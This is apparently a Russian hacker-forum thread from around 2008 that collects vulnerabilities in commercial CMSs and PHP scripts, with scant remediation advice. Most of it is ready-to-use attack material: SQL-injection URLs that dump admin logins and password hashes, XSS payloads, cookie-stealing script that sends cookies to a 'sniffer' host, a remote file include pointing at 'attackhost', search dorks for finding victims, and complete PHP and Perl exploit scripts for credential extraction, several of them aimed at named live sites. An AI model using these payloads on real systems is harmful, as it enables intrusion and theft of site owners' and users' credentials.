VistaCMS

Оф.сайт: http://www.vistacms.ru
Стоимость (в руб.): 13000-42000 o.O
------------------------------------------------
Раскрытие путей:

http://www.vistacms.ru/modules/kerne'l/
/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php

SQL-injection

Администраторская панель:

http://www.vistacms.ru/admin/
Логин: 1' or 1=1/*
Пароль: antichat.ru

Клиенты:
http://www.vistacms.ru/clients/

Автор: ZAMUT (c)

P.S.
Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.

UMI.CMS

Оф.сайт: www.umi-cms.ru
Стоимость (в руб.): 2990-29990
------------------------------------------
XSS(Активная)

Настройки ->

Уязвимые поля:
Фамилия
Имя
Отчество

<script>alert(document.cookie)</script>

Автор: ZAMUT (c)

Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...

цена ABO CMS на офф. сайте достигает 30000 рублей.
На этом движке работают крупные инет-магазины, банки, и т.д.

вот сплоит ТУТ (http://for-hack.narod.ru/bag.php) написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать...
Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте

S.Builder
Разработчик CMS CBS-Group
Номер версии S.Builder 3.756
Лицензия платная
Сайт www.sbuilder.ru
Демо-версия www.demo.sbuilder.ru
Функциональность портал
Стоимость (в руб.) от 2235 до 44700 руб.

для теста в вебе создают акк на сутки

SQL-injection

20 полей

http://cmssite/more.php?bc_tovar_id=2+order+by+20/*'


http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,version(),user(),databa se()),10,11,12,13,14,15,16,17,18,19,20/*'

системная инфа
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517


http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,table_schema,table_name ),10,11,12,13,14,15,16,17,18,19,20+from+informatio n_schema.tables/*'


пользователи

http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ binn_users/*'

название не смотрел ;) но мона через базу глянуть

VDNH
Оф. сайт http://www.vdnh.ru/
Лицензия - платная
Стоимость- от 6750- 176625
уязвимость - xss активная, пассивная
<script>alert('helloworld')</script>
также бажные у них гостевые книги.

Multiple Vulns in Bitrix CMS

Версия системы и история обновления

Vulnerable: Bitrix Site Manager 4.1.x

Exploit:

http://www.bitrix.ru/bitrix/updates/updater.log

XSS в редиректе:

Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.

Раскрытие пути

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:


http://host/bitrix/templates/.default/subscribe/subscr_form.php
http://host /bitrix/php_interface/dbquery_error.php


PHP Include

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:


http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/

"http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/

Amiro.CMS

сайт: amiro.ru

XSS (passive)

Сплоентс:
/saleoffset=saleoffset=<script>alert(document.cookie)</script>
/blabla<script>alert(document.cookie)</script>
by me +)

Mix Systems
vendor:http://mixsystems.com.ua

price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."

SQL injection

plugin:katalog
EX

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/*

version::user::database
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,versio n(),user(),database()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
users id::login::pwd::email
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id ,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18 +from+mix_users/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,lo gin,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+fr om+mix_users+limit+1,1/*


plugin=photogall
Ex

http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11

version::user::database
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5,concat_ws(0x3a3a,versi on(),user(),database()),7,8,9,10,11,12/*&cat=11
users id::login::pwd::email
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id, login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11

(c) halkfild

написал сплоит на CURL /*быстрее чем сокеты*/

<?

echo "\n";
echo "-------------------------Mix Systems CMS--------------------------"."\n";
echo "-----------------------coded by : halkfild------------------------"."\n";
echo "------------------------------------------------------------------"."\n";

if ($argc!=4){
echo " Usage: php ".$argv[0]." host type num_records\n";
echo " host: Your target ex www.target.com \n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
echo " num_records: number or returned records(if 0 - return all)\n";
echo " example: php script.php site.com 10\n";
echo "\n";
exit;
}

$host=$argv[1];
$type=$argv[2];
$count=$argv[3];

if ($argv[2]==1) {
$query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR( 64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13 ,14,15,16,17,18+from+mix_users+limit+";
$end=",1/*";
}
elseif ($argv[2]==2) {
$query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHA R(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11 ,12+from+ng_users+limit+";
$end=",1/*&cat=11";
}
else {
echo " incorrect parameter #2=".$argv[2]."\n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
exit;
}
$site=$host.'/'.$query;
$pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';
$i=0;

if(function_exists('curl_init'))
{
while(1) {
$ch = curl_init("http://".$site.$i.$end);

curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$res=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");

if(preg_match_all($pattern,$res,$out)) {
echo "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";
$i++;
$out=null;
}
else break;

if ($count!=0 && $i>$count) break;
}
echo ("Finish. /* ".$i." records*/ \n");
}
else
exit("Error:Libcurl isnt installed \n");

?>

ExpiCMS
www.expi-cms.ru
стоимость
1. Лицензия 1 год - 6 900 руб.

2. Лицензия 3 года - 12 900 руб.

3. Неограниченная лицензия - 17 490 руб

Пассивная xss

вход в админку www.expi-cms.ru/cms/login.php

в логин и пароль вставляеем например такую конструкцию :)

</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>

так например на marypoppinscafe.ru/cms/login.php выдает некотрую интересную информацию в частности User - mary_poppins DataBase - cms_express_oksana_mary_poppins

Shop-Script
Разработчик Articus dev. group
Лицензия платная
Сайт www.shop-script.ru/
Демо-версия www.demo.shop-script.ru/premium
Функциональность e-магазин
Стоимость (в руб.) от 0 до 5450 руб.

SQL injection

уязвимый скрипт invoice_phys.php
уязвимый парамерт order_time=
данные передаются кодированные в base64; возможен только посимвольный перебор
Пример уязвимого куска кода:
$_GET["orderID"] = (int) $_GET["orderID"];
$sql = 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'
WHERE orderID='.$_GET["orderID"].' AND
order_time="'.base64_decode($_GET["order_time"]).'" AND
customer_email="'.base64_decode($_GET["customer_email"]).'"';

Пример:
2008-03-16 14:24:11" or 1=1/*
Рабочий "код":
2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*
который нужно прогнать через base64_encode и передать скрипту.
Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде

Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22
Приблизительно 1500 стр...
Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html

Уязвимость не где не вылаживал, античат первый))

showNewsItem.php

Exploit:
showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,admin_id,user_name,password)+from+administ rator--

Пассы без шифрования
/admin/index.php

тамже
showGallery.php?pagetitle=Gallery&category=1+and+1=0+union+select+concat(user_name,0 x3a,password)+from+administrator/*

Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability +==--
--==+=============================================== =====================================+==--
- dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] EspSeC & Hack0wn!.

[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php

[~] /jobseekers/JobSearch.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*

* In memory of rgod

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+=============================================== =====================================+==--
[+] [The End]

# milw0rm.com [2008-06-14]

milw0rm.com [2008-06-14]

Пассивная XSS в ARTUS-master

Уязвимо поле поиска.

"><script>alert()</script>

например тут http://artus.ru/ :)

CNCat
XSS:
Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php

http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Не уверен, что платная CMS, но тем не менее :)

SQL-inj в Siteframe CMS

В скрипте folder.php, параметре id.

http://site.com/folder.php?id=[sql]

Боевой пример:

http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5, 6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11 +from+users--

================================================== ==============================
|| K-Links Directory SQL-INJECTION, XSS
================================================== ==============================

Application: K-Links Directory
--------------

Website: http://turn-k.net/k-links
-----------

Version: Platinum (All)
----------

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------

Googledork: Powered By K-Links Directory
---------------

Demo: http://klinksdemo.com
--------

Date: 24-07-2008
-------

Description:
---------------
Множественные SQL-Injection. Активные и пассивные XSS.


[ SQL-INJECTION ]

http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4 ,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 ,3,4,5,6,7,8 from platinum_admins where a_id=1/*


/* Admin Login - http://host/admin

Далее, через Manage Templates получаем веб-шелл. */

[ ACTIVE XSS ]

*) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.

*) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.

[ PASSIVE XSS :) ]

http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>


Author: Corwin
---------

Contact: corwin88[dog]mail[dot]ru
-----------

p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода.

================================================== ==============================
|| Dating 3 PHP Script SQL-INJECTION
================================================== ==============================

Application: E-topbiz Dating 3 PHP Script
------------

Version: All
--------

Website: http://e-topbiz.com/oprema/pages/dating3.php
--------

Demo: http://e-topbiz.com/trafficdemos/dating3
-----

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------

Date: 01-08-2008
-----

[ VULNERABLE CODE ]

members/mail.php

@Line:

142: if($action==inbox) {
143: $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");


150: if($action==veiw) {
151: $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");



===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

============================
|| PPVCHAT ACTIVE XSS
============================

Application: PPVCHAT
------------

Website: http://ppvchat.com/
--------

Version: All
--------

About: Pay-per-view adult video chat software. Price 999$.
------

Googledork: Copyright © 2006 PPVChat.com
-----------

Date: 05-07-2008
-----

Description:
------------
При регистрации новых пользователей/моделей нет фильтрации полей.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>


Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

================================================== ==============================
|| E-topbiz Payment Processor 2 SQL-INJECTION
================================================== ==============================

Application: E-topbiz Payment Processor 2
------------

Version: 2.0
--------

Website: http://e-topbiz.com/oprema/pages/pproc2.php
--------

Demo: http://e-topbiz.com/trafficdemos/payment2/
-----

About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008
-----

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

================================================== ==============================
|| Recipe Script SQL-INJECTION
================================================== ==============================

Application: Recipe Script
------------

Version: 6.0
--------

Website: http://fivedollarscripts.com
--------

Demo: http://recipebag.com
-----

Date: 03-08-2008
-----

[ VULNERABLE CODE ]

viewrecipe.php

3: $sql="select * from recipe where recipeid=$recid";
4: $res=mysql_query($sql);it");

259: $result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid");
260: if(mysql_num_rows($result))do it");


===>>> Exploit:

http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3,4,5,6,7,8,9 from recipesadmin.php

// Admin Login - http:/host/admin2

Greetzz !!! Форб, с отцовством бро! :-)!!


Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

================================================== ==============================
|| Bartender Drinks SQL-INJECTION
================================================== ==============================

Application: Bartender Drinks
------------

Version: All
--------

Website: http://fivedollarscripts.com
--------

Demo: http://fivedollarscripts.com/drinks/
-----

Date: 04-08-2008
-----

[ VULNERABLE CODE ]

viewdrinks.php

6: if($bgid=="")
{
$sql="select * from drink order by upldate desc";
}
else
{
12: $sql="select * from drink where categoryid=$bgid order by upldate desc";
}


viewdrink.php

3: $sql="select * from drink where drinkid=$recid";
$res=mysql_query($sql);


238: $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid");


===>>> Exploit:

http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/*

// Admin Login - http:/host/admin2


by me

XSS:

http://site/highlight/index.html?url=http://forum.antichat.ru.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest

Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query

XSS:

http://site/shop?se_namedomen=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
Уязвимость в скрипте shop в параметре se_namedomen

http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
В скрипте thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text

http://site/registration?login=%22%3E%3Cscript%3Ealert(documen t.cookie)%3C/script%3E
В скрипте registration в параметрах login, email, first_name, last_name.


Уязвимости на офф.сайте движка http://www.siteedit.ru


http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Ca%20href=http://forum.antichat.ru%3Eantichat%3C/a%3E

http://www.siteedit.ru/registration?last_name=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

SoSo News Express Pro 2.0.4. Blind SQL Injection Exploit (к сожалению, поковыряться удалось только в этой версии)

Уязвимый код:
В файле includes/info_home.php:
$this->client_ip=!empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ( !empty($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : (!empty($REMOTE_ADDR) ? $REMOTE_ADDR : '' ));
В файле modules/ajax/ajax_statistic.php:
$DB->query("SELECT session_time FROM ". $DB->prefix ."stat_session WHERE client_ip='". $Info->client_ip ."' AND session_time>=". $update_time ." ORDER BY session_time DESC LIMIT 0,1");

Как видим, поле X_FORWARDED_FOR заголовка запроса, не фильтруется.

Т.к. полученый Sql inj - слепой, но с выводом ошибки, используем запрос:
X_FORWARDED_FOR:-1' OR client_ip=IF(ascii(substring((SELECT user_password FROM news_user WHERE user_id=1),[POS],1))=[CHARCODE],'1',(SELECT 1 UNION SELECT 2))/*
Если запрос, НЕ вернул ошибку "Subquery returns ...", то на этой позиции находится символ [CHARCODE].

Сплоит запускать из коммандной строки, вот так: soso2sql.php http://site.com/ 1

Результат: md5(password).

Собственно код:

<?

//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";

set_time_limit(0);
ignore_user_abort(1);

function send_xpl($url, $xpl){
global $id;
global $cookie;
$u=parse_url($url);
$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
return $res;
}

function xpl($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}

if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}

$url=$argv[1];
$id=$argv[2];

echo $url."\r\n";

echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=97;$j<=102;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if (!$flag)
die("\r\nExploit failed\r\n");
}

echo " [DONE]\r\n";

?>


Скачать можно тут: http://www.x2b.ru/get/1401

З.Ы.
Проблема с X_FORWARDED_FOR присутствует и на официальном сайте, а значит наверняка и в более новых версиях.

Пример:


GET http://www.sosovn.com/index.php?mod=contact&act=send
Host: www.sosovn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
X_FORWARDED_FOR: test'
Keep-Alive: 300
Connection: keep-alive


Ну и раскрытие пути: http://site/ajax.php (для версии 2.0.4)

Огромное спасибо за выложеный баг. Я правда столкнулся с проблемой нахождения логина, пока не очень получаеться, немогли бы вы показать как вытащить логин админа?
спасибо!

Вот тебе версия которая после подбора хеша подбирает и логин админа. Подбирает в диапазоне [a-Z,0-9], если будет мало, внимательно поправь значения кодов символов во втором цикле for (в тех что внутри for($i=1;$i<=32;$i++) ).

<?

//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";

set_time_limit(0);
ignore_user_abort(1);

function send_xpl($url, $xpl){
global $id;
global $cookie;
$u=parse_url($url);
$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
return $res;
}

function xpl($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}

function xpl2($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select username from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}

if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}

$url=$argv[1];
$id=$argv[2];

echo $url."\r\n";

echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=97;$j<=102;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if (!$flag)
die("\r\nExploit failed\r\n");
}
echo " [DONE]\r\n";

echo "Trying to get username: ";
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=65;$j<=90;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if($flag!=1) {
for($j=97;$j<=122;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if($flag!=1) {
echo chr(8);
break;
}
}

echo " [DONE]\r\n";

?>

Скачать можно с: http://www.x2b.ru/get/1426

print.php

Vuln code:

$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*

http://milw0rm.com/exploits/6284
(c) ~!Dok_tOR!~

PlayCMS <= 2.0 SQL Injection

Type: Game Script
Price: $20
URL: www.playcms.com
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/game.php?gameid=-1'+union+select+1,user(),version(),4,5,6,database( ),8/*

http://localhost/[installdir]/index.php?gameid=-1'+union+select+1,2,3,4,5,6,7,8/*

(c) ~!Dok_tOR!~

Vastal I-Tech CMS

Оф.сайт: vastal.com (http://vastal.com)


Дата: 05.09.2008
Первоисточник: milw0rm.com (http://milw0rm.com)
Описание: Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)

Уязвимые компоненты:
Shaadi Zone 1.0.9 (tage) SQL Injection (http://milw0rm.com/exploits/6385)
Cosmetics Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6382)
Freelance Zone (coder_id) SQL Injection (http://milw0rm.com/exploits/6381)
Mag Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6380)
MMORPG Zone (game_id) SQL Injection (http://milw0rm.com/exploits/6379)
Jobs Zone (news_id) SQL Injection (http://milw0rm.com/exploits/6378)
DVD Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6376)
Share Zone (id) SQL Injection (http://milw0rm.com/exploits/6375)
Toner Cart (id) SQL Injection (http://milw0rm.com/exploits/6374)
Visa Zone (news_id) SQL Injection (http://milw0rm.com/exploits/6373)
Agent Zone (ann_id) SQL Injection (http://milw0rm.com/exploits/6371)

От меня:
Компонент: Mag Zone (mag_id)

#!/usr/bin/perl

use LWP::UserAgent;
use strict;

my ($ua,$answ);

&usage;

if(!$ARGV[2]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[2]";}

print "\n\n[~]Waiting...\n[~]Getting data -- [ user_name, password ]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727");
if($ARGV[2]){
$ua->proxy('http',"http://".$ARGV[2]."/");
}

$answ = $ua->get("http://$ARGV[0]/view_mag.php?mag_id=-1+union+select+1,2,3,concat(0x3a3a3a,user_name,0x3 a,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+members/*")->content;
$answ =~m#:::(.+):(.+):::#;
if(!$1) {print "\nExploit failed!";}
else { print "\n\nlogin : $1\npassword : $2\n"; }

sub usage
{
print q
{
################################################## ####################
Vastal I-Tech Mag Zone (mag_id) SQL Injection Exploit

INFO:
Author: ZAMUT
Vuln: mag_id=
Homepage: http://antichat.ru

Usage: exploit.pl [path] [proxy]
Example:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080
################################################## ####################
};

}

Используется так:
perl exploit.pl [полный путь до скрипта] [прокси:порт]

Пример:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080 или
perl exploit.pl www.vastal.com/mag
Поддержка только http - прокси.

E-phpscripts CMS Arya

Оф.сайт: ephpscripts.com (http://ephpscripts.com)
Дата: 09.09.08
Автор: ZAMUT
Дорк: inurl:article.php es_id

Описание: Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)
Ограничения: Нету

Эксплоит:
/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_a dmin/*&cid=2
Структура бд:

Table [information_schema]
Table [VIEWS]
TABLE_SCHEMA
TABLE_NAME
